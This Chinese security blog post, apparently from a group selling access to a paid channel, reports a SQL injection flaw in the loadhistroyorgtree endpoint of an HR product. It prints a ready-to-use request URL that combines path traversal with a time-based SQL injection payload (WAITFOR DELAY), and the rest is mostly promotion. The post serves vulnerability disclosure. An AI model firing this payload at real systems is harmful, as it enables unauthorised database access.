正文

[漏洞复现-77] 宏*-ehr-hcm loadhistroyorgtree sql注入漏洞

admin
admin V管理员 /0 评论 /181 阅读
1213
此篇文章发布距今已超过332天,您需要注意文章的内容或图片是否可用!



0x00免责声明


免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!




0x01漏洞概述


     宏*-ehr-hcm loadhistroyorgtree sql注入漏洞,攻击者可构造恶意请求获取系统信息等及其它安全风险。


0x02受影响URL





                受影响URL:

/w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree?isroot=child&parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A2%27--&kind=2&catalog_id=11&issuperuser=111&manageprive=111&action=111&target=



0x03漏洞详情





        

       漏洞类型: SQL注入漏洞
        影响:系统可用性和安全性威胁

       简述: 宏*-ehr-hcm loadhistroyorgtree sql注入漏洞攻击者可构造恶意请求获取系统信息,造成数据系统及其它安全风险。

nuclei脚本

               POC细节发布在知识星球

            专注于漏洞情报分享,不发烂大街的东西。星球外面的兄弟欢迎进来白嫖,不满意三天退款。放心大胆的进来嫖。

(星球内部分工具脚本截图)


0x04修复建议
                        建议用户升级到安全版本。

0x05星球精选主题





星球活跃度

 

精选主题一

精选主题二

精选主题三

精选主题四

精选主题五

        马赛克安全实验室星球期待您的加入,星球秉着高质量持续稳定的输出,星球成员活跃互帮互助,相互学习提升。





0x06团队介绍







          马赛克安全实验室专注于:漏洞复现、渗透测试、nday、0day、网络安全、红蓝对抗,持续输出安全相关漏洞情报、漏洞复现相关漏洞验证脚本及工具。



0x07工具列表

工具列表(点击可直接查看)




0x07工具列表

漏洞分析列表(点击可直接查看)




0x08复现列表

复现列表(点击可直接查看)








































































推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒zhousa.om